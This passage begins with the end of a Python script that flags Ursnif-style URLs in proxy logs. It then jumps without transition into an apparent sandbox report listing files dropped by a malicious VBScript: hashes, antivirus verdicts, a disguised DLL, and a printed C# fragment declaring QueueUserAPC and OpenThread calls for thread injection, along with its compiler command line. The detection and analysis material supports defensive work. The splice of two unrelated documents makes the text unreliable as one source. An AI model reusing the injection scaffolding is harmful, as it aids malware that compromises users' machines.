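# no extension, no hyphenated words, no query-like punctuation.
OPAQUE_SEGMENT = re.compile(r"[A-Za-z0-9_]+")

# Tuning thresholds; assumptions chosen to fit the three report URLs.
MIN_PATH_LEN = 200
MIN_SEGMENTS = 10
MIN_TOKENS = 2
ALERT_SCORE = 3


def path_segments(url: str) -> List[str]:
    """Non-empty path components of a URL."""
    return [s for s in urlsplit(url).path.split("/") if s]


def score_url(url: str) -> Dict[str, object]:
    """Score a URL against Ursnif-style URI features, one point each."""
    path = urlsplit(url).path
    segments = path_segments(url)
    # Count tokens on the slash-free body: an inserted slash can split a
    # token (the report's third URL contains "...HSy7T_/2BHlZ1...").
    body = "".join(segments)
    token_hits = sum(body.count(tok) for tok, _ in TOKEN_SUBSTITUTIONS)
    features = {
        "long_path": len(path) >= MIN_PATH_LEN,
        "many_segments": len(segments) >= MIN_SEGMENTS,
        "encoding_tokens": token_hits >= MIN_TOKENS,
        "opaque_segments": bool(segments)
        and all(OPAQUE_SEGMENT.fullmatch(s) for s in segments),
    }
    score = sum(features.values())
    return {"url": url, "score": score,
            "suspicious": score >= ALERT_SCORE, "features": features}


def recover_base64(url: str) -> str:
    """Strip inserted slashes and reverse the token substitutions.

    The first segment ("api1" in the report) is assumed to be a fixed prefix
    and is dropped. The result is still ciphertext; nothing here decrypts it.
    """
    body = "".join(path_segments(url)[1:])
    for token, char in TOKEN_SUBSTITUTIONS:
        body = body.replace(token, char)
    return body


def triage(urls: List[str]) -> List[str]:
    """URLs that reach the alert score, e.g. from a proxy-log sweep."""
    return [r["url"] for r in map(score_url, urls) if r["suspicious"]]


if __name__ == "__main__":
    for result in map(score_url, REPORT_URLS + [BENIGN_URL]):
        print(result["score"], result["suspicious"], result["url"][:70])
```

Run it as-is to see the three report URLs score 4 of 4 and the benign URL score 0. For a real sweep, feed `triage()` the URL column of proxy or web-filter logs; the feature dictionary returned by `score_url()` is what to surface in the alert so an analyst can see which traits fired rather than a bare score.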

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11606
Entropy (8bit): 4.883977562702998
Encrypted: false
SSDEEP: 192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5: 1F1446CE05A385817C3EF20CBD8B6E6A
SHA1: 1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256: 2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512: 252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious: false
Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):64
                                                                                                                                          Entropy (8bit):0.9260988789684415
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                                                                          MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                                                                          SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                                                                          SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                                                                          SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                                                                          Malicious:false
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.0.cs
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):402
                                                                                                                                          Entropy (8bit):5.038590946267481
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:V/DsYLDS81zuJeMRSR7a1ehk1wJveJSSRa+rVSSRnA/fuHo8zy:V/DTLDfuC3jJWv9rV5nA/2IAy
                                                                                                                                          MD5:D318CFA6F0AA6A796C421A261F345F96
                                                                                                                                          SHA1:8CC7A3E861751CD586D810AB0747F9C909E7F051
                                                                                                                                          SHA-256:F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
                                                                                                                                          SHA-512:10EB4A6982093BE06F7B4C15F2898F0C7645ECD7EFA64195A9940778BCDE81CF54139B3A65A1584025948E87C37FAF699BE0B4EB5D6DFAEC41CDCC25E0E7BDA8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tba. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr muapoay,IntPtr ownmggmyjwj,IntPtr blggfu);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uxd,uint egqs,IntPtr yobweqmfam);.. }..}.
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.cmdline
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):369
                                                                                                                                          Entropy (8bit):5.190216598085259
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fUIcuLB0zxs7+AEszIWXp+N23fUIR:p37Lvkmb6KH8IcuLGWZE88IcuLb
                                                                                                                                          MD5:24BE68FFF8EAA55D3C33C00303B73669
                                                                                                                                          SHA1:3B60675D2F1C66F56C169FE73B0077E524E61C30
                                                                                                                                          SHA-256:88DB8DE76BD31E11E87287F28B3545CDCD4DCEA3A16DDB91A89C064BE5239708
                                                                                                                                          SHA-512:803599C04897A15448DBE0A8E5B09495EFB338028DFC337CE83C795A54F905603C11E97851A2D0F648E4A9243559D2D727A6DB75AEE2D7ECB249F1AF5DF576BA
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.0.cs"
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.dll
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3584
                                                                                                                                          Entropy (8bit):2.6017371333042956
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:etGSl/W2Dg85xL/XsB4z2tL4zqhRqPPtkZfw7Jn+II+ycuZhN/lcakSmlxPNnq:6IWb5xL/OfbuuJC9n1ulya3Gq
                                                                                                                                          MD5:E7B23700D8DBED4C15449B550BC621C7
                                                                                                                                          SHA1:B48EE8E597ABF16BDC44BFEA58993B639C197EE0
                                                                                                                                          SHA-256:196BD4C06808ED7E436BC2BF98522415E8DAD44C86A784A1D7A070EEA32CF81D
                                                                                                                                          SHA-512:65B1C6660468591FCDC28A3501D7CCB08D49C24808C5685A84A4022C31BB1A72CF819F4B150CDFC9DCC75C4307C39D52908DDE91A8D62F220654490B6BC924D8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V6._...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....o.....{.....................a. ...a...!.a.%...a.......*.....3./.....6.......C.......V................................................<Module>.1b1iaete.dll.tba.W32.mscorlib.Syst
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1b1iaete\1b1iaete.out
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):412
                                                                                                                                          Entropy (8bit):4.871364761010112
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                          C:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:MSVC .res
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):652
                                                                                                                                          Entropy (8bit):3.0771840022658674
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryFlcak7YnqqmlxPN5Dlq5J:+RI+ycuZhN/lcakSmlxPNnqX
                                                                                                                                          MD5:71BD86730A14259922C6CE17D85643B2
                                                                                                                                          SHA1:44DDB11E6A34390B91825C2335145DE939E3D22E
                                                                                                                                          SHA-256:A76332733CC299074CA37F8E1E3A46C5534DDCC0DBA737992B1985D09D13AA87
                                                                                                                                          SHA-512:E854C3757F6767FDA5CEB4973F89B3D29BF804A319F21B373A569B2B107D82C14D9648249B968D29A264507D20B35ED46E46E0DD697614471D371EFF6BD60102
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.b.1.i.a.e.t.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.b.1.i.a.e.t.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                          C:\Users\user\AppData\Local\Temp\Ammerman.zip
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):41922
                                                                                                                                          Entropy (8bit):7.9900732828260255
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:768:iPRP7HHNs72bLXJnkNQmgOAhghqgwZJTpT/6gKffcvv7ovDTvxfz:GRP7HnbLZkGLOKBJT2ffhvvxfz
                                                                                                                                          MD5:94F926A14F611ED85B2AD7F5C108D930
                                                                                                                                          SHA1:920C9F8B4B8100DEDA928646DBFABA7D8E7AA6DE
                                                                                                                                          SHA-256:BA9979A733F1226AD56803023880155FECAAEDAB7ABB4DC9552BD674D47FE62F
                                                                                                                                          SHA-512:3DD6E4E6381AC5128860FF102E4CD3625E5BB621A077CD367231BD8FB49CD9BE09C0DF0C2AC7EAD62015DE95C446904124041460555A78225ACB2D72DD8DC506
                                                                                                                                          Malicious:true
                                                                                                                                          C:\Users\user\AppData\Local\Temp\FCC.cxx
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):32
                                                                                                                                          Entropy (8bit):4.413909765557392
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:4EA3ppfn:4LZx
                                                                                                                                          MD5:1F1A0E8B8B957A4E0A9E76DAD9F94896
                                                                                                                                          SHA1:CC1DDD54FA942B6731653D8B35C1DB90E6DBBD34
                                                                                                                                          SHA-256:D106B73E76E447E35062AE309FE801B57BBEE7AC193B7ABCF45178ADA7D40BB3
                                                                                                                                          SHA-512:10505ED4511DC023850C7AB68DDCE48E54581AAC7FD8370BAFE3A839431EFC2E94B24D3B72ED168362388A938348C5216F1199532D356B0F45D2F9D6B3A2753E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ZWJmCemKPVQNwvupbUKEMAALZhNPjPJb
                                                                                                                                          C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                          Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):89
                                                                                                                                          Entropy (8bit):4.384574622669155
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:oVXVPi9tgU48JOGXnFPi9tgpSun:o9YtgU4qotggu
                                                                                                                                          MD5:C1997D9C943C96D25A824762561C6091
                                                                                                                                          SHA1:E9AFB5B3FD6918A84B3053CFB4C4B8BCE8C4EEAC
                                                                                                                                          SHA-256:0878B5DD91030DB7F7048540F545EA9CEA892AEA144AA907C411F7184CAAAF65
                                                                                                                                          SHA-512:9ADBF60FC0FAFBE6994BE2596F2437D584D4ECEAE2A186A0A6311DF4E02626B013846B9E98D9E39E011BD2855367203451AA6D96DF40C8060647884444A71484
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: [2020/11/20 13:33:54.306] Latest deploy version: ..[2020/11/20 13:33:54.306] 11.211.2 ..
                                                                                                                                          C:\Users\user\AppData\Local\Temp\RES3556.tmp
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2184
                                                                                                                                          Entropy (8bit):2.6994186263112407
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:bP7FGghHGhKdNNI+ycuZhN/lcakSmlxPNnq9qpje9Ep:bPBcKd31ulya3Gq9A
                                                                                                                                          MD5:A64A8B609CA0B334D081D3E3B2294AA5
                                                                                                                                          SHA1:AD2C4D227D5DE9E14B7409D21F1D065375AF95A0
                                                                                                                                          SHA-256:A48B4631C2EFCB751DEEA797CB80CBF0DFE4007419F427646C7544B62B98088B
                                                                                                                                          SHA-512:D37C8F1D7C9D22F7099F287DBA250F0A3FC2D80318EE536F6B4E8CC85A2853864F49FE030B1048EFCC81E586FB50A5836AE7BD47A7F49B6FD3B7F0E03DF1A20C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ........S....c:\Users\user\AppData\Local\Temp\1b1iaete\CSC8D8F05B01A304F97BCE9A6F7324A364.TMP................q..s..%."....VC...........4.......C:\Users\user\AppData\Local\Temp\RES3556.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\RES45E1.tmp
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2184
                                                                                                                                          Entropy (8bit):2.711876922400887
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:bPXYfhHyuYhKdNNI+ycuZhNbakSdPNnq9qpmMe9Ep:bPKSzKd31ulba3Hq9Vy
                                                                                                                                          MD5:602FB8B3CB63B5AA78B20C9170F13596
                                                                                                                                          SHA1:4B4E2DC98B88F5349A39F00FCA92241E746A9AA3
                                                                                                                                          SHA-256:70D0413F1433D1786CAC910E7403BDD7898EE44B49AFB54332E3F1C271026CF0
                                                                                                                                          SHA-512:F6961DFD968F487E8587B5B94B204264E18F174D233B6271E65C248DA6C6B9CD271B774715C391DB19A6BCC83B6888931EC43D372FBB0146BB106BC2722E5DCF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ........S....c:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP..................4.P.J................4.......C:\Users\user\AppData\Local\Temp\RES45E1.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\Tolstoy.3gp
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):24
                                                                                                                                          Entropy (8bit):4.136842188131013
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:L0a3dGn:AOGn
                                                                                                                                          MD5:DE116F46B1AB756FE5FC714826D9C77C
                                                                                                                                          SHA1:C0543E108146A86E97F9C92D84550415FF0D07F6
                                                                                                                                          SHA-256:B83A7A9918FBC774A1CBF2D5C700D86B64D91961728A7BBEC91FF74CE27C6CBA
                                                                                                                                          SHA-512:FFA07A13C6527B966AB311853D6FF493D9F9EF7B22A530DD52FE06CF41D43880A310F39826DD1D6ED24A54C8C4E0A70E4E2073F52B01BF045715F60833F02FE8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: thzQhBrCvRRGaQnmDrodlryY
                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lh5pn2oo.e51.ps1
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 1
                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeee2m1p.fyr.psm1
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 1
                                                                                                                                          C:\Users\user\AppData\Local\Temp\adobe.url
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):108
                                                                                                                                          Entropy (8bit):4.699454908123665
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
                                                                                                                                          MD5:99D9EE4F5137B94435D9BF49726E3D7B
                                                                                                                                          SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
                                                                                                                                          SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
                                                                                                                                          SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                                                                                                                                          C:\Users\user\AppData\Local\Temp\bowerbird.m3u
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):58
                                                                                                                                          Entropy (8bit):5.116264615668023
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:AtNBcCRVqrGZgME1:AKAArcE1
                                                                                                                                          MD5:FCA5D5C49A23B8614C6F821ABC873200
                                                                                                                                          SHA1:C6982C28BD133E0317D388EFDFE29CB78A5AB6BA
                                                                                                                                          SHA-256:9EC7D8CE210B398464E1AE84073DA79284983AEA1AE6AD5985DC77AE95C1C242
                                                                                                                                          SHA-512:534D876A9BA54CAD210D801582A285D0F9E4385660B6ABFA5C278396644FBD41B1C4F7B2A5FDDB3F6EBC1BDEAE5D99D6E2E34F149697642F4B7E0F0510C641E9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: faHHqDeJlByuQgYuKmjhviPLnmNtvZyJwtONsUcwIeBPlokSmxWvLayqrB
                                                                                                                                          C:\Users\user\AppData\Local\Temp\earmark.avchd
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):48128
                                                                                                                                          Entropy (8bit):7.67702661060525
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:Nh66vv4Fgs48pcQqQjeCE+2SfNfAhghqgwZJTpT/6gKffcSapyLeq6pTXY:TrYJ4586SfZKBJT2ffXhkD
                                                                                                                                          MD5:78B3444199A2932805D85CFDB30AD6FB
                                                                                                                                          SHA1:A1826A8BDD4AA6FC0BF2157A6063CCA5534A3A46
                                                                                                                                          SHA-256:66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF
                                                                                                                                          SHA-512:E940BE2888085DE21BA3BF736281D0BEEC6B2B96B7C6D2CD1458951FD20A9ABFA79677393918C7A3877949F6BFC4B33E17200C739AADE0BA33EF4D3F58A0C4ED
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: 6znkPyTAVN7V.vbs, Detection: malicious, Browse
                                                                                                                                          • Filename: a7APrVP2o2vA.vbs, Detection: malicious, Browse
                                                                                                                                          • Filename: 03QKtPTOQpA1.vbs, Detection: malicious, Browse
                                                                                                                                          Preview: MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......_...........!...I..................... ....@..................................t....@.................................@...X....................................................................................................................text............................... ..`.data........ ......................@....reloc..............................@..B................U..}..u..*.............}..u.1....}..u.1....}..u.1.....SWV..k...............^_[.1.H)...k.6u..j@h.0..h@...j.....@.Sh@...h. @.P......U..`.}..u..M..U..0......a.........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:MSVC .res
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):652
                                                                                                                                          Entropy (8bit):3.1059983471948236
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1MOak7YnqqmMPPN5Dlq5J:+RI+ycuZhNbakSdPNnqX
                                                                                                                                          MD5:95D58934AE501F4ADB82D7F4C02EDAAE
                                                                                                                                          SHA1:3103D6F9DEAFDFD18796CC8627DF5DE4F89AEBB4
                                                                                                                                          SHA-256:472483F2A01C5135380442B81F5EB97B95A73058D019D98F2184AF56961458B5
                                                                                                                                          SHA-512:237F43D99C07BF66CD80FDD57AFD924495EF8D9E8B44B64F2D238D9021D60F470CF177B2555EF2CB4160DDF79BBCEBC15B99888904603FC6F9E2C15EC23D2BD9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.f.3.3.r.p.c.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.f.3.3.r.p.c.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                          C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.0.cs
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):414
                                                                                                                                          Entropy (8bit):5.000775845755204
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:V/DsYLDS81zuJ0VMRSRa+eNMjSSRr5DyBSRHq10iwHRfKFKDDVWQy:V/DTLDfue9eg5r5Xu0zH5rgQy
                                                                                                                                          MD5:216105852331C904BA5D540DE538DD4E
                                                                                                                                          SHA1:EE80274EBF645987E942277F7E0DE23B51011752
                                                                                                                                          SHA-256:408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
                                                                                                                                          SHA-512:602208E375BCD655A21B2FC471C44892E26CA5BE9208B7C8EB431E27D3AAE5079A98DFFE3884A7FF9E46B24FFFC0F696CD468F09E57008A5EB5E8C4C93410B41
                                                                                                                                          Malicious:true
